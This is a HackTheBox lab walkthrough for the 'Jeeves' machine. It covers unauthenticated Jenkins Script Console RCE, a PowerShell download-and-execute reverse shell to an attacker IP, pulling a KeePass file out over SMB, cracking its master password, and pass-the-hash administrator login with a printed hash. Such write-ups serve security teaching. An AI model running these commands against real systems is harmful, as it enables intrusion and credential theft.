Jeeves – HackTheBox writeup

info
Target IP: 10.10.10.63

Exploitation Summary

Initial Exploitation

  • Vulnerability: Remote code execution via Jenkins Script Console
  • Explanation: Jenkins management console is available without login and resulted in code execution through the Script Console

Privilege Escalation

  • Vulnerability: Weak master password of keepass file
  • Explanation: keepass is used to store credentials including some administrative credentials. However, weak password is used to protect the keepass file, leading to exposure of administrative credentials

Enumeration

nmap -p- -A -T4 10.10.10.63
nmap
TCP 80: IIS 10.0
TCP 135: RPC
TCP 445: Microsoft-ds
TCP 50000: Jetty 9.4.z-SNAPSHOT (http)

Initial Shell Exploitation

Quick check on port 445 using smbmap -H 10.10.10.63 shows that credentials is needed. So there’s not much information to gather from port 445. There seems to be 2 website running, one on port 80 and another one on port 50000. Let’s check out the website on default port 80 first.

website on port 80

Cool, look like we can ask Jeeves some questions. I just randomly type something and click Search.

error

Oh wow. Am I lucky? Could this be the entry point? I go back and do a few more searches. Interestingly, all resulted in the same error. I then check out the source of the search page.

source

It turns out the search ALWAYS returns the error page, no matter what. So it’s not really doing any search dynamically.

Ok, let’s check out the other website:

website on port 50000

Ah, there’s no content on this website.

Directory scan using gobuster

Gobuster does not find any interesting folder on port 80 but is able to find a directory /askjeeves on port 50000 using the following command:

 
 
gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,401,403"
gobuster

Navigate to http://10.10.10.63:50000/askjeeves

jenkins

Jenkins. Nice, finally find something. What’s even better is that it doesn’t seem to require login and I can access the script console at Manage Jenkins > Script Console

script console

Jenkins is an open source automation server with hundreds of plugins to support building, deploying and automating any project. Script console allows you to execute arbitrary code using Groovy script. For more information about Jenkins, check out https://jenkins.io

Let’s test by running the command ‘whoami‘ using the following groovy script:

 def sout = new StringBuffer(), serr = new StringBuffer()
 String ps = 'whoami'
 def proc = ps.execute()
 proc.consumeProcessOutput(sout, serr)
 proc.waitForOrKill(1000)
 println "out> $sout err> $serr"
whoami

The command is executed successfully and reveals that the user hosting the website is jeeves\kohsuke

I would like to get a reverse shell using Powershell script. Let’s check if Powershell is available by changing the command to:

String ps = 'cmd /c "cd / && dir powershell.exe /s"'
check powershell

Nice, Powershell is available. Now I would like to use Invoke-PowerShellTcp.ps1 from nishange to get a reverse shell.

Setup webserver to host the file Invoke-PowerShellTcp.ps1

If you don’t already have this powershell script, you can install nishang by:

apt-get install nishang

I would also append the follow code to automatically invoke the reverse shell when the script is uploaded:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 443
host powershelltcp

Netcat to listen on port 443

nc -nvlp 443

Run following script to upload Invoke-PowerShellTcp.ps1 & execute:

def sout = new StringBuffer(), serr = new StringBuffer()
String cmd = "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.34/Invoke-PowerShellTcp.ps1')"
String ps = 'powershell -c "' + cmd + '"' 
def proc = ps.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"
upload
note: waitForOrKill function should be removed or it will kill the process
user shell

Got the user shell!

User flag

user flag

Privilege Escalation

Browsing around C:\Users\kohsuke I quickly find an interesting file CEH.kdbx at C:\Users\kohsuke\documents. Looks like it’s a keepass file used to store and protect credentials.

CEH.kdbx

Download CEH.kdbx using smbserver

impacket-smbserver Share `pwd`
smbserver

Folder /root/work is now shared using name called Share and is accessible at \\10.10.14.34\Share. Now issue the copy command:

copy CEH.kdbx \\10.10.14.34\Share
copy

Crack keepass master password

keepass2john CEH.kdbx > keepass-hash
john keepass-hash --wordlist=/usr/share/wordlists/rockyou.txt
john

Found the master password: moonshine1

Open CEH.kdbx using keepass

I download keepass and install it on my Windows VM to open CEH.kdbx

keepass

Enter the master password to reveal the credentials

keepass credentials

There’s a bunch of passwords. If any of the password is for administrator, we can login using pth-winexe through port 445.

Tried all passwords and failed. The very last credentials with title ‘Backup stuff’ is not a password, but instead password hash and looks like NTLM hash. We can try pass the hash login.

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
root shell

Got it. Logged in as administrator.

Root flag

There’s no root.txt but instead found hm.txt which tells me to look deeper. Running command dir /R reveals a hidden file hm.txt:root.txt using Alternate Data Stream. The content of the hidden file can be retrieved using the following powershell script

Get-Content -Path hm.txt -Stream root.txt
root flag

Thank you box Jeeves’s creator, mrb3n!

Leave a Reply

Close Menu